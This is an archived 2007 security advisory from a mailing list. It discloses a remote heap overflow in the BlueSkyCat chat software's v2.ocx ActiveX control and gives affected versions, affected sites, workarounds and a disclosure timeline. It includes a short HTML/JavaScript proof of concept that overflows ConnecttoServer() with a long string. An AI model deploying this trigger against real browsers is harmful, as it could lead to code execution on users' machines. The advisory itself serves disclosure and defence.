lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 31 Jul 2007 09:10:43 +0800 From: Code Audit Labs <vulnhunt@...il.com> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, vulnwatch@...nwatch.org Subject: CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability BACKGROUND: =========== BlueSkychat is a professional voice and video chat software widely used by large chat websites in china. DESCRIPTION: ============ Code Audit Labs Code Audit for BlueSkyCat ActiveX Control and discovered a vulnerability . Remote exploitation of a buffer overflow in an ActiveX control distributed with Bluesky.cn could allow for the execution of arbitrary code. When Blueskychat are installed, they register the following ActiveX control on the system: ProgId: V2.V2Ctrl.1 ClassId: 2EA6D939-4445-43F1-A12B-8CB3DDA8B855 File: v2.ocx This control contains a buffer overflow in its ConnecttoServer() method. This is a clent side vulnerability. So the clients of following chat servers which install the affected BlueSkyCat software are affected. bliao http://www.bliao.com qqliao http://www.qqliao.com 7liao http://www.7liao.com haoliao http://www.haoliao.net 51liao http://chat.51liao.net heshang http://www.heshang.net xicn http://vchat.xicn.net CN104 http://www.cn104.com liao-tian http://www.liao-tian.com aliao http://www.aliao.net kuailiao http://www.kuailiao.com mtliao http://www.mtliao.com pj0427 http://www.pj0427.com uighur http://chat.uighur.cn wmliao http://www.wmliao.com CVE: ==== We request a CVE number to assign to this vulnerability. Affected version: ================ v2.ocx version 8.1.2.0 and prior vendor: ======= BlueSky http://www.bluesky.cn/ POC: ======== <html> <head> <OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}"> </OBJECT> </head> <body> <SCRIPT language="javascript"> function ClickForRunCalc() { var heapSprayToAddress = 0x0d0d0d0d; var payLoadCode = "A" ; while (payLoadCode.length <= 10000) payLoadCode+='A'; com.ConnecttoServer("1",payLoadCode,"3","4","5"); } </script> <button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button> </body> </html> Code Audit Labs Suggestion ========================== for vendor: Do a full coverage Code Audit or Code Review for client: The following workarounds are available for this vulnerability: * Disable Active Scripting * Unregister the vulnerable control * Set the killbit for the vulnerable control * or update the software from http://www.bluesky.cn DISCLOSURE TIMELINE: ==================== 1: 2007-07-29 notice vendor (mail to blueskychat@...il.com) 2: 2007-07-29 the vendor reply "thank,had fixed it". 3: 2007-07-30 we check it out, in fact,the websites which install the software did not almost all be updated,send mail to vendor again. 4: 2007-07-31 release this report About Us: ========= Code Audit Labs secure your software,provide Professional include source code audit and binary code audit service. Code Audit Labs:" You create value for customer,We protect your value" http://www.VulnHunt.com Original LINK: ============== 1: http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability_en.txt 2: http://CodeAudit.blogspot.com EOF -- Code Audit Labs http://www.vulnhunt.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists